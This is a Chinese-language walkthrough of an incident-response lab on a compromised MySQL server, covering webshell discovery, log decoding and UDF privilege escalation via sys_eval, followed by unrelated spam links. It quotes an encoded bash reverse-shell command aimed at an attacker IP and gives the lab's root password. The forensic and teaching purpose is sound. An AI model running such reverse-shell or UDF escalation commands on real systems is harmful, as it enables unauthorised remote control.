当前位置: 首页 > wzjs >正文

系统管理中心优化大师哪个好

系统管理中心,优化大师哪个好,掌握商务网站建设内容,企业网站注销流程简介 mysql应急响应 ssh账号 root 密码 xjmysql ssh env.xj.edisec.net -p xxxxx 1.黑客第一次写入的shell flag{关键字符串} 2.黑客反弹shell的ip flag{ip} 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx 4.黑客获取的权限 flag{whoami后的值} 1.黑客…

简介

mysql应急响应 ssh账号 root  密码 xjmysql
ssh env.xj.edisec.net  -p xxxxx
1.黑客第一次写入的shell flag{关键字符串}
2.黑客反弹shell的ip flag{ip}
3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
4.黑客获取的权限 flag{whoami后的值}

1.黑客第一次写入的shell flag{关键字符串}

因为是查找shell,我们可以尝试使用如下命令进行查找:

find ./ type f -name "*.php" | xargs grep "eval("

发现了sh.php文件,使用cat命令进行查看,成功找到了flag

我们也可以把该站点给下载到本地,使用D盾进行查找。

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

2.黑客反弹shell的ip flag{ip}

 咱们先去查看一下数据库的日志信息,看看能不能找到什么线索,路径:(上传文件的记录会出现在 MySQL error.log 中

/var/log/mysql/error.log

发现,这很可能是在执行 /tmp/1.sh 脚本的第 9 行时,发生了一个与文件保存或数据传输相关的操作。

cat一下这个文件,找到了flag

也可以在/var/log/apache2/access.log日志中看到sys_eval中的命令,但我们需要对其进行处理

%27echo%20YmFzaCAtaSA%2BJi9kZXYvdGNwLzE5Mi4xNjguMTAwLjEzLzc3NyAwPiYx%7Cbase64%20-d%3E%2Ftmp%2F1.sh%27

进行url解码,在base64解码也是可以看见黑客的IP地址的

flag{192.168.100.13}

3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx

黑客要进行提权的话,他肯定是知道连接账号和密码,所以我们就要猜他怎么知道的,我们就要去看是不是有东西泄露了密码。

我们在如下文件中,发现了数据库的账号密码

/var/www/html/common.php

我们就可以进行登录其数据库。

基于目前的环境我们可以排除

MOF 提权(MOF 提权是一个有历史的漏洞,基本上在 Windows Server 2003 的环境下才可以成功。)

启动项提权(这种提权也常见于 Windows 环境下,当 Windows 的启动项可以被 MySQL 写入的时候可以使用 MySQL 将自定义脚本导入到启动项中,这个脚本会在用户登录、开机、关机的时候自动运行。)

CVE-2016-6663提权

  1. MySQL 版本需要 <= 5.5.51 或 5.6.x <= 5.6.32 或 5.7.x <= 5.7.14 或 8.x < 8.0.1
  2. MariaDB 版本需要 <= 5.5.51 或 10.0.x <= 10.0.27 或 10.1.x <= 10.1.17

,而我们环境的 MariaDB 版本为 5.5.64,不在此漏洞的影响版本内,也可以排除掉

MySQL 提权方法整理 - Geekby's Blog   参考链接

所以现在只有UDF提权的可能性,UDF(自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用)

我们使用如下指令来查看mysql是否有对文件操作进行限制,也就是说黑客能不能在数据库中写入任意文件:

show global variables like '%secure%';

1.secure_file_priv = NULL ,限制文件的读取和写入。

2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。

3.secure_file_priv=   , 对文件和读取和写入没有任何限制。

发现是空白,所以说是UDF提权的概率又增加了。

我们使用如下指令来查看插件目录:

show variables like '%plugin%'; 

打开插件的目录,发现一个udf.so文件,其路径为:/usr/lib/mysql/plugin/udf.so

使用md5进行加密MD5 在线加密工具 | 菜鸟工具

提交flag{b1818bde4e310f3d23f1005185b973e7}

4.黑客获取的权限 flag{whoami后的值}

我们在mysql.func表查看是否有异常的UDF函数。

func表:是专门用于存储用户自定义函数(UDF,User-Defined Functions)的相关信息。用户自定义函数指的是用户依据自身需求创建的函数,这些函数可以在 SQL 查询里使用,以实现特定的功能。

select * from mysql.func;

发现有一个sys_eval()函数,接着使用这个函数去执行whoami的操作

select sys_eval('whoami');

另外 在/var/log/apache2/access.log 日志中也发现了黑客也在使用了该函数。

flag{mysql}

下期预告:第二章日志分析-redis应急响应

http://www.dtcms.com/wzjs/22235.html

相关文章:

  • 怎样做网站 app教程百度关键词价格
  • 做网站页面对PS切图营销方式
  • 可靠的东莞网站推广快速建站哪个平台好
  • 编写网站代码个人域名注册流程
  • 汽配网站建设百度推广售后电话
  • 凤岗镇仿做网站福州百度seo排名软件
  • 中信建设官方网站软件下载百度快速收录提交工具
  • 全网品牌推广企业宁波seo推广服务电话
  • 网站建设空间什么意思桌子seo关键词
  • 税务咨询百度网站优化工具
  • 福州 网站建设网络平台的推广方法
  • 原阳县建站塔山双喜游戏推广平台
  • 山西省建设工程招投标监督网站seo建站技术
  • 自建网站学大教育培训机构怎么样
  • 今天开始做魔王免费观看网站痘痘怎么去除效果好
  • 设计师培训招生视频搜索引擎优化seo什么意思
  • jtbc网站开发百度投诉中心24人工客服电话
  • 常州青竹网络做网站怎样做一个网页
  • 网站seo分析案例搜索排行
  • 铁岭网站建设网络优化舆情监测系统
  • 深圳做网站优化的公司网络推广深圳有效渠道
  • 企业搭建pc端网站武汉做网络推广的公司
  • 描述建设一个网站的基本步骤百度关键词屏蔽
  • 云主机 网站吗百度直接打开
  • 网站qq微信分享怎么做的长沙百度seo代理
  • 电商设计招聘seo入门版
  • 新沂网站设计免费的精准引流软件
  • 好的网站制作国外网站推广平台有哪些?
  • 微信公众号登录平台登录官网绍兴百度seo排名
  • 如何搭建自己的网站平台近期重大新闻